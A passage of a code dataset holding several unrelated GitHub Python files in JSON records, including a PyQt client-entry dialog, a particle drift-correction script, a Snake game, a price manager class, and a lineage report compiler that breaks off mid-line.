self.zmien_na_firme.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.zmien_na_firme.setObjectName(\"zmien_na_firme\")\n\n self.zmien_na_firme.clicked.connect(self.zmiana_na_firma)\n self.verticalLayout_2.addWidget(self.zmien_na_firme)\n self.imie = QtWidgets.QLabel(self.page)\n self.imie.setMinimumSize(QtCore.QSize(0, 0))\n self.imie.setMaximumSize(QtCore.QSize(140, 16777215))\n self.imie.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.imie.setObjectName(\"imie\")\n self.verticalLayout_2.addWidget(self.imie)\n self.miejsce_na_imie = QtWidgets.QLineEdit(self.page)\n self.miejsce_na_imie.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.miejsce_na_imie.setObjectName(\"miejsce_na_imie\")\n\n self.verticalLayout_2.addWidget(self.miejsce_na_imie)\n self.nazwisko = QtWidgets.QLabel(self.page)\n self.nazwisko.setMaximumSize(QtCore.QSize(140, 16777215))\n self.nazwisko.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.nazwisko.setObjectName(\"nazwisko\")\n self.verticalLayout_2.addWidget(self.nazwisko)\n self.mijesce_na_nazwisko = QtWidgets.QLineEdit(self.page)\n self.mijesce_na_nazwisko.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.mijesce_na_nazwisko.setObjectName(\"mijesce_na_nazwisko\")\n self.verticalLayout_2.addWidget(self.mijesce_na_nazwisko)\n self.pesel = QtWidgets.QLabel(self.page)\n self.pesel.setMaximumSize(QtCore.QSize(140, 16777215))\n self.pesel.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.pesel.setObjectName(\"pesel\")\n self.verticalLayout_2.addWidget(self.pesel)\n self.mijejsce_na_pesel = QtWidgets.QLineEdit(self.page)\n self.mijejsce_na_pesel.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.mijejsce_na_pesel.setObjectName(\"mijejsce_na_pesel\")\n self.verticalLayout_2.addWidget(self.mijejsce_na_pesel)\n self.frame = QtWidgets.QFrame(self.page)\n self.frame.setMaximumSize(QtCore.QSize(16777215, 64))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setSpacing(9)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n spacerItem = QtWidgets.QSpacerItem(209, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout.addItem(spacerItem)\n\n self.przycisk_anuluj = QtWidgets.QPushButton(self.frame)\n self.przycisk_anuluj.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_anuluj.setObjectName(\"przycisk_anuluj\")\n self.przycisk_anuluj.clicked.connect(Dialog.close)\n\n self.horizontalLayout.addWidget(self.przycisk_anuluj)\n self.przycisk_dodaj = QtWidgets.QPushButton(self.frame)\n self.przycisk_dodaj.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_dodaj.setObjectName(\"przycisk_dodaj\")\n self.przycisk_dodaj.clicked.connect(self.dodaj_klient)\n self.przycisk_dodaj.clicked.connect(Dialog.close)\n\n\n self.horizontalLayout.addWidget(self.przycisk_dodaj)\n self.verticalLayout_2.addWidget(self.frame)\n self.stackedWidget.addWidget(self.page)\n self.page_2 = QtWidgets.QWidget()\n self.page_2.setObjectName(\"page_2\")\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.page_2)\n self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_3.setSpacing(9)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.pushButton_2 = 
QtWidgets.QPushButton(self.page_2)\n self.pushButton_2.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.pushButton_2.clicked.connect(self.zmiana_na_klient)\n\n self.verticalLayout_3.addWidget(self.pushButton_2)\n self.nazwa_firmy = QtWidgets.QLabel(self.page_2)\n self.nazwa_firmy.setMaximumSize(QtCore.QSize(140, 16777215))\n self.nazwa_firmy.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.nazwa_firmy.setObjectName(\"nazwa_firmy\")\n self.verticalLayout_3.addWidget(self.nazwa_firmy)\n self.miejsce_na_nazwe_firmy = QtWidgets.QLineEdit(self.page_2)\n self.miejsce_na_nazwe_firmy.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.miejsce_na_nazwe_firmy.setObjectName(\"miejsce_na_nazwe_firmy\")\n self.verticalLayout_3.addWidget(self.miejsce_na_nazwe_firmy)\n self.nip = QtWidgets.QLabel(self.page_2)\n self.nip.setMaximumSize(QtCore.QSize(140, 16777215))\n self.nip.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.nip.setObjectName(\"nip\")\n self.verticalLayout_3.addWidget(self.nip)\n self.miejsce_na_nip = QtWidgets.QLineEdit(self.page_2)\n self.miejsce_na_nip.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.miejsce_na_nip.setObjectName(\"miejsce_na_nip\")\n self.verticalLayout_3.addWidget(self.miejsce_na_nip)\n self.frame_2 = QtWidgets.QFrame(self.page_2)\n self.frame_2.setMinimumSize(QtCore.QSize(0, 0))\n self.frame_2.setMaximumSize(QtCore.QSize(16777215, 64))\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.frame_2)\n self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_2.setSpacing(9)\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n spacerItem1 = QtWidgets.QSpacerItem(209, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_2.addItem(spacerItem1)\n self.przycisk_anuluj_2 = QtWidgets.QPushButton(self.frame_2)\n self.przycisk_anuluj_2.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_anuluj_2.setObjectName(\"przycisk_anuluj_2\")\n self.przycisk_anuluj_2.clicked.connect(Dialog.close)\n\n self.horizontalLayout_2.addWidget(self.przycisk_anuluj_2)\n self.przycisk_dodaj_2 = QtWidgets.QPushButton(self.frame_2)\n self.przycisk_dodaj_2.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_dodaj_2.setObjectName(\"przycisk_dodaj_2\")\n self.przycisk_dodaj_2.clicked.connect(self.dodaj_firma)\n self.przycisk_dodaj_2.clicked.connect(Dialog.close)\n self.horizontalLayout_2.addWidget(self.przycisk_dodaj_2)\n self.verticalLayout_3.addWidget(self.frame_2)\n self.stackedWidget.addWidget(self.page_2)\n self.verticalLayout.addWidget(self.stackedWidget)\n\n self.retranslateUi(Dialog)\n self.stackedWidget.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dodawanie klienta\"))\n self.zmien_na_firme.setText(_translate(\"Dialog\", \"zmien na firme\"))\n self.imie.setText(_translate(\"Dialog\", \"
Imie\"))\n        self.nazwisko.setText(_translate(\"Dialog\", \"Nazwisko\"))\n        self.pesel.setText(_translate(\"Dialog\", \"Pesel\"))\n        self.przycisk_anuluj.setText(_translate(\"Dialog\", \"anuluj\"))\n        self.przycisk_dodaj.setText(_translate(\"Dialog\", \"dodaj\"))\n        self.pushButton_2.setText(_translate(\"Dialog\", \"zmien na klienta\"))\n        self.nazwa_firmy.setText(_translate(\"Dialog\", \"Nazwa firmy:\"))\n        self.nip.setText(_translate(\"Dialog\", \"Nip
\"))\n self.przycisk_anuluj_2.setText(_translate(\"Dialog\", \"anuluj\"))\n self.przycisk_dodaj_2.setText(_translate(\"Dialog\", \"dodaj\"))\n self.miejsce_na_nazwe_firmy.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj nazwe firmy.\"))\n self.miejsce_na_imie.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj imię.\"))\n self.mijesce_na_nazwisko.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj nazwisko.\"))\n self.mijejsce_na_pesel.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj pesel.\"))\n self.miejsce_na_nip.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj nip.\"))\n\n\n def zmiana_na_klient(self):\n self.stackedWidget.setCurrentWidget(self.page)\n\n def zmiana_na_firma(self):\n self.stackedWidget.setCurrentWidget(self.page_2)\n\n\n def dodaj_klient(self):\n imie=self.miejsce_na_imie.text()\n nazwisko=self.mijesce_na_nazwisko.text()\n pesel=self.mijejsce_na_pesel.text()\n self.system.dodaj_klienta(Osoba(imie,nazwisko,pesel))\n\n\n\n def dodaj_firma(self):\n nip=self.miejsce_na_nip.text()\n nazwa_firmy=self.miejsce_na_nazwe_firmy.text()\n self.system.dodaj_klienta(Firma(nip,nazwa_firmy))\n\n\n","repo_name":"Bluefish5/Database-Airplane-System","sub_path":"modules/menu_klient.py","file_name":"menu_klient.py","file_ext":"py","file_size_in_byte":10615,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12551747888","text":"import Detection.ctrack as ctrack\nimport Detection.convertFiles as conFiles\nimport Detection.detectParticles as dpart\nimport numpy as np\nimport sys\nimport os\nfrom time import strftime\n\n#correct for rotation of Sample on tracks\ndef rotationCorrection_tracks(part_tracks,drifttracks):\n return\n\n\n\n#create Drift correction on Trajectories\ndef driftCorrection_tracks(part_tracks,drifttracks):\n\n tracklen = len(drifttracks[0].track)\n for tr in part_tracks:\n if len(tr.track) != tracklen:\n print(\"Error: !!!Tracks don't have same length!!!\")\n sys.exit(1)\n\n drift_displ = ctrack.ParticleTrack(id=1,num_elements=tracklen)\n contribnum = np.zeros(tracklen)\n\n for track in drifttracks:\n x = np.nan\n x_start = np.nan\n y = np.nan\n y_start = np.nan\n firstelement = True\n for i in range(tracklen):\n x = track.track[i]['x']\n y = track.track[i]['y']\n if firstelement:\n if not np.isnan(x) and not np.isnan(y):\n x_start = x\n y_start = y\n firstelement = False\n else:\n continue\n else:\n if x != np.nan and y != np.nan:\n if np.isnan(drift_displ.track[i]['x']) and np.isnan(drift_displ.track[i]['y']):\n drift_displ.track[i]['x'] = (x - x_start)\n drift_displ.track[i]['y'] = (y - y_start)\n else:\n drift_displ.track[i]['x'] += x - x_start\n drift_displ.track[i]['y'] += y - y_start\n contribnum[i] += 1\n\n for i in range(len(contribnum)):\n drift_displ.track[i]['x'] /= contribnum[i]\n drift_displ.track[i]['y'] /= contribnum[i]\n\n for track in part_tracks:\n for i in range(len(track.track)):\n if not np.isnan(drift_displ.track[i]['x']) and not np.isnan(drift_displ.track[i]['y']):\n track.track[i]['x'] -= drift_displ.track[i]['x']\n track.track[i]['y'] -= drift_displ.track[i]['y']\n\n return part_tracks\n\n#correct for rotation of Sample on particle positions\ndef rotationCorrection_particles(drifttracks):\n \n tracklen = len(drifttracks[0].track)\n angles = np.zeros((len(drifttracks),tracklen),dtype=np.float)\n for i in range(1,len(drifttracks),1):\n for j in range(tracklen):\n dx = drifttracks[i].track[j]['x'] - drifttracks[0].track[j]['x']\n dy = drifttracks[i].track[j]['y'] - 
drifttracks[0].track[j]['y']\n angles[i,j] = dy/dx\n angles = np.arctan(angles)\n anglecorrection = angles[1:,1:] - angles[1:,:-1]\n\n return anglecorrection.mean(axis=0), drifttracks[0].track[['x', 'y']]\n\ndef translationCorrection_particles(drifttracks):\n tracklen = len(drifttracks[0].track)\n drift_displ = ctrack.ParticleTrack(id=1,num_elements=tracklen)\n contribnum = np.zeros(tracklen)\n\n for track in drifttracks[:min(1,len(drifttracks))]:\n x = np.nan\n x_start = np.nan\n y = np.nan\n y_start = np.nan\n firstelement = True\n for i in range(tracklen):\n x = track.track[i]['x']\n y = track.track[i]['y']\n\n #USING previous as reference\n if np.isnan(x_start) and np.isnan(y_start):\n x_start = x\n y_start = y\n else:\n if x != np.nan and y != np.nan:\n if np.isnan(drift_displ.track[i]['x']) and np.isnan(drift_displ.track[i]['y']):\n drift_displ.track[i]['x'] = (x - x_start)\n drift_displ.track[i]['y'] = (y - y_start)\n else:\n drift_displ.track[i]['x'] += x - x_start\n drift_displ.track[i]['y'] += y - y_start\n contribnum[i] += 1\n\n ''' \n #USING 0 AS REF\n if firstelement:\n if not np.isnan(x) and not np.isnan(y):\n x_start = x\n y_start = y\n firstelement = False\n else:\n continue\n else:\n if x != np.nan and y != np.nan:\n if np.isnan(drift_displ.track[i]['x']) and np.isnan(drift_displ.track[i]['y']):\n drift_displ.track[i]['x'] = (x - x_start)\n drift_displ.track[i]['y'] = (y - y_start)\n else:\n drift_displ.track[i]['x'] += x - x_start\n drift_displ.track[i]['y'] += y - y_start\n contribnum[i] += 1\n '''\n\n for i in range(len(contribnum)):\n drift_displ.track[i]['x'] /= contribnum[i]\n drift_displ.track[i]['y'] /= contribnum[i]\n drift_displ.track[i]['frame'] = i+1\n\n return drift_displ\n\n\n#create Drift correction on Particle Positions\ndef driftCorrection_particles(part_positions,drifttracks,rotcorrection=True):\n\n tracklen = len(drifttracks[0].track)\n if len(part_positions) != tracklen:\n print(\"Error: !!!Tracks don't have same length!!!\")\n sys.exit(1)\n\n drift_displ = translationCorrection_particles(drifttracks)\n angle_change, rotcenter = rotationCorrection_particles(drifttracks)\n\n \n for i in range(1,len(part_positions)):\n count = 0\n for part in part_positions[i]:\n if not np.isnan(angle_change[i-1]) and rotcorrection:\n l = np.sqrt((part.x - rotcenter[i]['x'])**2 + (part.y - rotcenter[i]['y'])**2)\n phi = np.arctan((part.y - rotcenter[i]['y'])/(part.x - rotcenter[i]['x']))\n factor = np.sign(part.x - rotcenter[i]['x'])\n part.x = rotcenter[i]['x'] + factor * l * np.cos(phi - angle_change[i-1])\n part.y = rotcenter[i]['y'] + factor * l * np.sin(phi - angle_change[i-1])\n if not np.isnan(drift_displ.track[i]['x']) and not np.isnan(drift_displ.track[i]['y']):\n part.x -= drift_displ.track[i]['x']\n part.y -= drift_displ.track[i]['y']\n\n return part_positions\n\ndef doTrack(particle_file,searchRadius=2,minTracklen=1,linkRange=2):\n print(\"Tracking from File\")\n date = strftime(\"%Y%m%d-%H%M%S\")\n path = os.path.dirname(particle_file)\n particles = conFiles.readDetectedParticles(particle_file)\n\n tracks = ctrack.link_particles(particles,searchRadius,link_range=linkRange,min_track_len=minTracklen,outfile=path+\"/foundTracks-SR{:}_{:}.txt\".format(searchRadius,date))\n print(\"Done Linking\\n Writing log file now\")\n\n outfile = open(path+\"/tracking-SR{:}_{:}.log\".format(searchRadius,date),'w')\n timestr = strftime(\"%Y-%m-%d %H:%M:%S\")\n\n outfile.write(\"Tracking Log File\\n==================\\n\\n\")\n outfile.write(\"Time: {:}\\n\".format(timestr))\n 
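# (aside) the explicit open()/close() pair used for this log mirrors the original style; the equivalent idiom 'with open(log_path, \"w\") as outfile:' would close it automatically (log_path being a hypothetical name).\n    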
outfile.write(\"\\nSystem Parameters:\\n------------------\\n\")\n outfile.write(\"Particle File: {:}\\n\".format(particle_file))\n outfile.write(\"\\nTracking Parameters:\\n---------------------\\n\")\n outfile.write(\"Search Radius = {:}px\\n\".format(searchRadius))\n outfile.write(\"Link Range = {:} frames\\n\".format(linkRange))\n outfile.write(\"Minimum Track Length = {:} frame(s)\\n\".format(minTracklen))\n outfile.write(\"\\n=== Track-IDs =================\\n\")\n for track in tracks:\n outfile.write(\"{:}\\n\".format(track.id))\n outfile.close()\n print(\"Done\")\n\n return tracks\n\ndef doTrack_direct(particles, searchRadius=2,minTracklen=1,linkRange=2,infilename=\"Not Defined\",drift=False,path=\".\"):\n date = strftime(\"%Y%m%d-%H%M%S\")\n\n print(\"Tracking\")\n if drift:\n tracks = ctrack.link_particles(particles,searchRadius,link_range=int(linkRange),min_track_len=minTracklen,outfile=path+'/fiducialTracks-SR{:}_{:}.txt'.format(searchRadius,date))#\"foundTracks-SR{:}_{:}.txt\".format(searchRadius,date))\n else:\n tracks = ctrack.link_particles(particles,searchRadius,link_range=int(linkRange),min_track_len=minTracklen,outfile=path+'/foundTracks-SR{:}_{:}.txt'.format(searchRadius,date))#\"foundTracks-SR{:}_{:}.txt\".format(searchRadius,date))\n\n print(\"Done Linking\\n Writing log file now\")\n\n outfile = open(path+\"/tracking-SR{:}_{:}.log\".format(searchRadius,date),'w')\n timestr = strftime(\"%Y-%m-%d %H:%M:%S\")\n\n outfile.write(\"Tracking Log File\\n==================\\n\\n\")\n outfile.write(\"Time: {:}\\n\".format(timestr))\n outfile.write(\"\\nSystem Parameters:\\n------------------\\n\")\n outfile.write(\"Particle File: {:}\\n\".format(infilename))\n outfile.write(\"\\nTracking Parameters:\\n---------------------\\n\")\n outfile.write(\"Search Radius = {:}px\\n\".format(searchRadius))\n outfile.write(\"Link Range = {:} frames\\n\".format(linkRange))\n outfile.write(\"Minimum Track Length = {:} frame(s)\\n\".format(minTracklen))\n outfile.write(\"\\n=== Track-IDs =================\\n\")\n for track in tracks:\n outfile.write(\"{:}\\n\".format(track.id))\n outfile.close()\n\n return tracks\n\n#Do driftcorrect on detected particles.\ndef position_with_driftcorrect(fn,path='.'):\n #Create drift tracks from positions\n drifttracks = doTrack_direct(fn[1],searchRadius=2,linkRange=2,drift=True,path=path)\n #Apply drift correction to feducial markers for verification and save\n #pparts = driftCorrection_particles(fn[1],drifttracks)\n #path = os.path.dirname(fn[1])\n #date = strftime(\"%Y%m%d-%H%M%S\")\n #doTrack_direct(pparts,outfile=path+\"/driftcorrectedTracksFM-SR{:}_{:}.txt\".format(2,date),infilename=fn[1],linkRange=link_range)\n #Apply drift correction to other channel and save\n #path = os.path.dirname(fn[0])\n print(\"Correcting for Drift now\")\n sys.stdout.flush()\n pparts = driftCorrection_particles(fn[0],drifttracks)\n conFiles.writeParticleFile(pparts,filename=path+\"/driftlessParticles.txt\")\n print(\"Done!\")\n sys.stdout.flush()\n return pparts\n\n#Do drift correct on detected particles and track them afterwards\ndef track_with_driftcorrect(fn,searchRadius,link_range=2,path='.'):\n #Create drift tracks from positions\n drifttracks = doTrack_direct(fn[1],searchRadius=2,linkRange=2,drift=True,path=path)\n #Apply drift correction to feducial markers for verification and save\n '''\n pparts = driftCorrection_particles(fn[1],drifttracks)\n path = os.path.dirname(fn[1])\n date = strftime(\"%Y%m%d-%H%M%S\")\n 
doTrack_direct(pparts,outfile=path+\"/driftcorrectedTracksFM-SR{:}_{:}.txt\".format(2,date),infilename=fn[1],linkRange=link_range)\n #Apply drift correction to other channel and save\n path = os.path.dirname(fn[0])\n '''\n print(\"Correcting for Drift now\")\n sys.stdout.flush()\n pparts = driftCorrection_particles(fn[0],drifttracks)\n conFiles.writeParticleFile(pparts,filename=path+\"/driftlessParticles.txt\")\n date = strftime(\"%Y%m%d-%H%M%S\")\n print(\"Done! Start tracking driftless particles.\")\n t = doTrack_direct(pparts,outfile=\"driftcorrectedTracks-SR{:}_{:}.txt\".format(searchRadius,date),infilename=fn[0],linkRange=link_range,path=path)\n print(\"Done!\")\n return t\n\n\n\nif __name__==\"__main__\":\n\n '''\n driftfile = \"L:/Cel6B-5-26-10/45C/OD1/Experiment4/C-2-AnalyzedData/foundTracks-SR2_20170209-020552.txt\"\n trackfile = \"L:/Cel6B-5-26-10/45C/OD1/Experiment4/C-1-AnalyzedData/foundTracks-SR2_20170209-020551.txt\"\n '''\n driftfile = \"L:/Cel5A-6-22-10/45C/OD06/Experiment3/C-2-AnalyzedData/foundTracks-SR2_20170209-020551.txt\"\n trackfile = \"L:/Cel5A-6-22-10/45C/OD06/Experiment3/C-2-AnalyzedData/foundTracks-SR2_20170209-020551.txt\"\n positionfile = \"L:/Cel5A-6-22-10/45C/OD06/Experiment3/C-2-AnalyzedData/foundPositions.txt\"\n\n drifttracks,driftlist = ctrack.readTrajectoriesFromFile(driftfile)\n part_tracks,part_list = ctrack.readTrajectoriesFromFile(trackfile)\n part_positions = conFiles.readDetectedParticles(positionfile)\n\n #pt = driftCorrection_tracks(part_tracks,drifttracks)\n pparts = driftCorrection_particles(part_positions,drifttracks)\n\n path = os.path.dirname(positionfile)\n \n conFiles.writeParticleFile(pparts,filename=path+\"/driftlessParticles.txt\")\n\n\n\n\n","repo_name":"MarkusRose/ParticleTracker","sub_path":"AnalysisTools/driftCorrection.py","file_name":"driftCorrection.py","file_ext":"py","file_size_in_byte":12127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15712809930","text":"\n\n\n#################### SNAKE GAME ###########################\n\n#Imports\nfrom turtle import Screen\nfrom snake import Snake\nfrom food import Food\nfrom scoreboard import Scoreboard\nfrom title import Title\nfrom field import Field\nimport time\n\n\n#Screen setup\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.bgcolor('black') \nscreen.title('Snake game in Python')\nscreen.tracer(0)\n\n#Create title\ntitle = Title()\n\n#Create field\nfield = Field()\n\n#Create snake\nsnake = Snake()#trigger a create_snake method \n\n#Snake control by keys\nscreen.listen()\nscreen.onkey(snake.up, \"Up\")#Capitalize letter for arrows\nscreen.onkey(snake.down,\"Down\")#func and key in parenthesis\nscreen.onkey(snake.left,\"Left\")\nscreen.onkey(snake.right,\"Right\")\n\n#Create food\nfood = Food()\n\n#Create scoreboard\nscoreboard = Scoreboard()\n\n#Game\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n\n #Snake moving\n snake.move()\n\n #Detect collision with food = update scoreboard = extend snake\n if snake.head.distance(food) < 15:\n #print('nom nom nom')\n food.refresh()#self method from food class\n snake.extend()\n scoreboard.increase_score()#self method from scoreboard class\n\n #End game \n #Detect collision with wall - \n #In while loop to stop the loop!!\n FIELD_SIZE = 257\n if snake.head.xcor() > FIELD_SIZE or snake.head.xcor() < -FIELD_SIZE or snake.head.ycor() > FIELD_SIZE or snake.head.ycor() < -FIELD_SIZE:\n scoreboard.reset_score()#for counting high_score game_is_on 
is still True\n        snake.reset_snake()\n        # #stop the game \n        # game_is_on = False#Stop loop condition\n        # scoreboard.game_over()#Use method from scoreboard class to end game\n        # print('GAME OVER')\n\n\n    #Collision with tail\n    #if the head collides with any segment in the tail:\n    #trigger counting a new high score \n    for segment in snake.segments[1:]:#loop over every segment\n        #slice list to avoid touching head case\n        if snake.head.distance(segment) < 10: #check distance from head to segment\n            scoreboard.reset_score()\n            snake.reset_snake()\n            # #stop the game\n            # game_is_on = False\n            # scoreboard.game_over()\n\n\n    # #Collision with tail\n    # #if head collides with tail any segment in the tail:\n    # #trigger game_over\n    # for segment in snake.segments:#loop for every segments\n    #     #to avoid touching head case\n    #     if segment == snake.head:#without this game is end\n    #         pass\n    #     elif snake.head.distance(segment) < 10:\n    #         # #stop the game\n    #         # game_is_on = False\n    #         # scoreboard.game_over()\n\n\n\n#Exit game\nscreen.exitonclick()","repo_name":"RockPiryt/Snake_game_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72631367128","text":"#coding:utf8\n'''\n    This script just generates the paths of all files and stores them in f.txt\n    Beforehand, all files need to be extracted into a single directory\n    The files live under F:\\test\\hksl\n    The project lives under E:\\python_work\\dtProc\\\n    (Alternatively, extra code could walk every subdirectory of the root to collect all file paths)\n'''\nimport os\n\nwith open(r\"E:\\python_work\\dtProc\\f.txt\",'w+') as f:\n    for root,dirs,files in os.walk(r\"F:\\test\\hksl\"):\n        print(root,dirs,files)\n        for i in files:\n            print(root + \"\\\\\" + i + \"\\n\")\n            f.write(root + \"\\\\\" + i + \"\\n\")\n","repo_name":"zhmi1204/satelliteDateDeal","sub_path":"getFilesName.py","file_name":"getFilesName.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36180108017","text":"from database.product_dao import ProductDao\nfrom database.price_by_time_dao import PriceByTimeDao\nfrom managers.manager_helper import ManagerHelper\nfrom utils.response_utils import ResponseUtils\n\nclass PriceByTimeManager(object):\n\n    def initialize(self):\n        priceByTime = PriceByTimeDao()\n        priceByTime.createTable()\n\n    #-----------------------------------------------------------------------------\n    # insert a new price balancer\n    #-----------------------------------------------------------------------------\n    def insert(self, sku, token):\n        user = ManagerHelper.validateToken(token)\n        if 'error' in user:\n            return user\n\n        #Validate product by SKU\n        productDao = ProductDao()\n        product, exception = productDao.getProductBySellerSku(user, sku)\n        if exception != None:\n            return ResponseUtils.generateErrorResponse(exception)\n\n        # Add missing arguments and insert to our database\n        sku['name'] = product['name'].encode('utf-8')\n        sku['link'] = product['url'].encode('utf-8')\n        sku['special_price'] = product['special_price']\n\n        priceByTime = PriceByTimeDao()\n        result = priceByTime.insert(sku, user)\n        if 'error' in result:\n            return ResponseUtils.generateErrorResponse(result['error'])\n        else:\n            return ResponseUtils.generateSuccessResponse()\n\n    #-----------------------------------------------------------------------------\n    # update price balancer's info\n    #-----------------------------------------------------------------------------\n    def update(self, sku, token):\n        user = ManagerHelper.validateToken(token)\n        if 'error' in user:\n            return 
user\n\n priceByTime = PriceByTimeDao()\n result = priceByTime.update(sku, user)\n if 'error' in result:\n return ResponseUtils.generateErrorResponse(result['error'])\n else:\n return ResponseUtils.generateSuccessResponse()\n\n #-----------------------------------------------------------------------------\n # delete a price balancer\n #-----------------------------------------------------------------------------\n def delete(self, sku, token):\n user = ManagerHelper.validateToken(token)\n if 'error' in user:\n return user\n\n priceByTime = PriceByTimeDao()\n result = priceByTime.delete(sku, user)\n if 'error' in result:\n return ResponseUtils.generateErrorResponse(result['error'])\n else:\n return ResponseUtils.generateSuccessResponse()\n\n #-----------------------------------------------------------------------------\n # get all price by time\n #-----------------------------------------------------------------------------\n def getAll(self, token):\n user = ManagerHelper.validateToken(token)\n if 'error' in user:\n return user\n\n priceByTime = PriceByTimeDao()\n result = priceByTime.getAll(user)\n if result:\n return ResponseUtils.generateSuccessResponse(result)\n else:\n return ResponseUtils.generateErrorResponse(\"Error\")\n\n\n\n\n\n\n","repo_name":"viethoa/seller","sub_path":"server/managers/price_by_time_manager.py","file_name":"price_by_time_manager.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39420524890","text":"#!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task(delay=0.05)\ndef task_4_3():\n for i in range(6):\n count=0\n while not wall_is_on_the_right() and count!=27:\n move_right()\n if not cell_is_filled():\n fill_cell()\n count+=1\n count=0\n move_down()\n while not wall_is_on_the_left() and count!=27:\n if not cell_is_filled():\n fill_cell()\n count+=1\n move_left()\n move_down()\n count=0\n move_right()\n pass\n\n\nif __name__ == '__main__':\n run_tasks()\n","repo_name":"G1nger19/Courses","sub_path":"MIPTpython/1.robot-tasks-master/task_20.py","file_name":"task_20.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5187558076","text":"import pandas as pd\nimport numpy as np\nimport glob\nimport datetime as dt\nimport argparse\n\ndef parse_date(f):\n prefix = f.strip(\"./\").split(\".\")[0]\n if len(prefix) == 0:\n return np.nan\n date = dt.datetime.strptime(\"-\".join(prefix.split(\"-\")[1:]), \"%Y-%m-%d\")\n return date\n\ndef read_group(gls):\n dfv = []\n for i,f in enumerate(sorted(glob.glob(gls))):\n date = parse_date(f)\n df = pd.read_csv(f,sep='\\t')\n df['date'] = date\n df['num'] = i\n dfv.append(df)\n return pd.concat(dfv)\n\ndef argparser():\n parser = argparse.ArgumentParser(description=\"Compile and filter periodic reports and cladestats files to produce a set of high quality lineages for formal designation.\")\n parser.add_argument(\"-i\",\"--input\",default='./',help=\"Path to a directory containing *report.tsv and *cladestats.txt files to compile. Defaults to the current directory\")\n parser.add_argument(\"-g\",\"--growth\",default=0,type=float,help=\"Minimum weekly periodic percentage change in the size of the lineage over the period after its first appearance. 
Default is 0, meaning lineages that shrink or remain static over any week are filtered.\")\n parser.add_argument(\"-s\",\"--final_size\",default=5,type=int,help=\"Set a minimum absolute gain in lineage size over the time period examined. Default 5\")\n parser.add_argument(\"-e\",\"--escape_change\",default=0,type=float,help=\"Minimum gain of immune escape as estimated by Bloom DMS data. Default is 0 (no change to escape value).\")\n parser.add_argument(\"-p\",\"--persistence\",default=0,type=int,help=\"Minimum number of consecutive trees since designation to include a lineage. Default 0 (new lineages in the final tree can be accepted).\")\n parser.add_argument(\"-o\",\"--output\",default=\"compiled_report.tsv\",help=\"Name the compiled output report tsv.\")\n parser.add_argument(\"-a\",\"--active\",action='store_true',help='Include only lineages that were actively growing within the last week examined.')\n return parser.parse_args()\n\ndef main():\n args = argparser()\n rdf = read_group(args.input + \"*proposed.report.tsv\")\n cdf = read_group(args.input + \"*cladestats.txt\")\n sizes = cdf.set_index(['clade','num']).sort_index().groupby(\"clade\").inclusive_count.max().to_dict()\n dates = cdf.set_index(['clade','num']).sort_index().groupby(\"clade\").date.max().to_dict()\n tchange = cdf.set_index(['clade','num']).sort_index().groupby(\"clade\").exclusive_count.pct_change()\n slopes = 